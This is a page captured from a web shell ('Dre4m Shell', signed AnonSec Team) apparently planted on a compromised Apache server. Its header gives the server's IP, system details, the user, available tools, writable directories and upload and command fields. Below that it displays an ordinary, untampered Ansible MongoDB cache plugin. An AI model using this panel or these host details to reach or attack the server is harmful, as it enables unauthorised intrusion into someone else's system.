Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.137.221.114
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/community/mongodb/plugins/cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/community/mongodb/plugins/cache/mongodb.py
# (c) 2018, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
name: mongodb
author:
  - Matt Martz (@sivel)
version_added: "1.0.0"
short_description: Use MongoDB for caching
description:
    - This cache uses per host records saved in MongoDB.
requirements:
    - pymongo>=3
options:
    _uri:
        description:
        - MongoDB Connection String URI
        required: False
        env:
          - name: ANSIBLE_CACHE_PLUGIN_CONNECTION
        ini:
          - key: fact_caching_connection
            section: defaults
    _prefix:
        description: User defined prefix to use when creating the DB entries
        default: ansible_facts
        env:
          - name: ANSIBLE_CACHE_PLUGIN_PREFIX
        ini:
          - key: fact_caching_prefix
            section: defaults
    _timeout:
        default: 86400
        description: Expiration timeout in seconds for the cache plugin data. Set to 0 to never expire
        env:
          - name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
        ini:
          - key: fact_caching_timeout
            section: defaults
        type: integer
'''

import datetime

from contextlib import contextmanager

from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.plugins.cache import BaseCacheModule
from ansible.utils.display import Display
from ansible.module_utils._text import to_native

pymongo_missing = False

try:
    import pymongo
except ImportError:
    pymongo_missing = True

display = Display()


class CacheModule(BaseCacheModule):
    """
    A caching module backed by mongodb.
    """
    def __init__(self, *args, **kwargs):
        try:
            if pymongo_missing:
                raise AnsibleError("The 'pymongo' python module is required for the mongodb fact cache, 'pip install pymongo>=3.0'")
            super(CacheModule, self).__init__(*args, **kwargs)
            self._connection = self.get_option('_uri')
            self._timeout = int(self.get_option('_timeout'))
            self._prefix = self.get_option('_prefix')
        except KeyError:
            self._connection = C.CACHE_PLUGIN_CONNECTION
            self._timeout = int(C.CACHE_PLUGIN_TIMEOUT)
            self._prefix = C.CACHE_PLUGIN_PREFIX

        self._cache = {}
        self._managed_indexes = False

    def _ttl_index_exists(self, collection):
        '''
        Returns true if an index named ttl exists
        on the given collection.
        '''
        exists = False
        try:
            indexes = collection.list_indexes()
            for index in indexes:
                if index["name"] == "ttl":
                    exists = True
                    break
        except pymongo.errors.OperationFailure as excep:
            raise AnsibleError('Error checking MongoDB index: %s' % to_native(excep))
        return exists

    def _manage_indexes(self, collection):
        '''
        This function manages indexes on the mongo collection.
        We only do this once, at run time based on _managed_indexes,
        rather than per connection instantiation as that would be overkill
        '''
        _timeout = self._timeout
        if _timeout and _timeout > 0:
            try:
                collection.create_index(
                    'date',
                    name='ttl',
                    expireAfterSeconds=_timeout
                )
            except pymongo.errors.OperationFailure:
                # We make it here when the fact_caching_timeout was set to a different value between runs
                if self._ttl_index_exists(collection):
                    collection.drop_index('ttl')
                return self._manage_indexes(collection)
        else:
            if self._ttl_index_exists(collection):
                collection.drop_index('ttl')

    @contextmanager
    def _collection(self):
        '''
        This is a context manager for opening and closing mongo connections as needed. This exists as to not create a global
        connection, due to pymongo not being fork safe (http://api.mongodb.com/python/current/faq.html#is-pymongo-fork-safe)
        '''
        mongo = pymongo.MongoClient(self._connection)
        try:
            db = mongo.get_default_database()
        except pymongo.errors.ConfigurationError:
            # We'll fall back to using ``ansible`` as the database if one was not provided
            # in the MongoDB Connection String URI
            db = mongo['ansible']

        # The collection is hard coded as ``cache``, there are no configuration options for this
        collection = db['cache']
        if not self._managed_indexes:
            # Only manage the indexes once per run, not per connection
            self._manage_indexes(collection)
            self._managed_indexes = True

        yield collection

        mongo.close()

    def _make_key(self, key):
        return '%s%s' % (self._prefix, key)

    def get(self, key):
        if key not in self._cache:
            with self._collection() as collection:
                value = collection.find_one({'_id': self._make_key(key)})
            self._cache[key] = value['data']

        return self._cache.get(key)

    def set(self, key, value):
        self._cache[key] = value
        with self._collection() as collection:
            collection.update_one(
                {'_id': self._make_key(key)},
                {
                    '$set': {
                        '_id': self._make_key(key),
                        'data': value,
                        'date': datetime.datetime.utcnow()
                    }
                },
                upsert=True
            )

    def keys(self):
        with self._collection() as collection:
            return [doc['_id'] for doc in collection.find({}, {'_id': True})]

    def contains(self, key):
        with self._collection() as collection:
            return bool(collection.count({'_id': self._make_key(key)}))

    def delete(self, key):
        del self._cache[key]
        with self._collection() as collection:
            collection.delete_one({'_id': self._make_key(key)})

    def flush(self):
        with self._collection() as collection:
            collection.delete_many({})

    def copy(self):
        with self._collection() as collection:
            return dict((d['_id'], d['data']) for d in collection.find({}))

    def __getstate__(self):
        return dict()

    def __setstate__(self, data):
        self.__init__()

Anon7 - 2022
AnonSec Team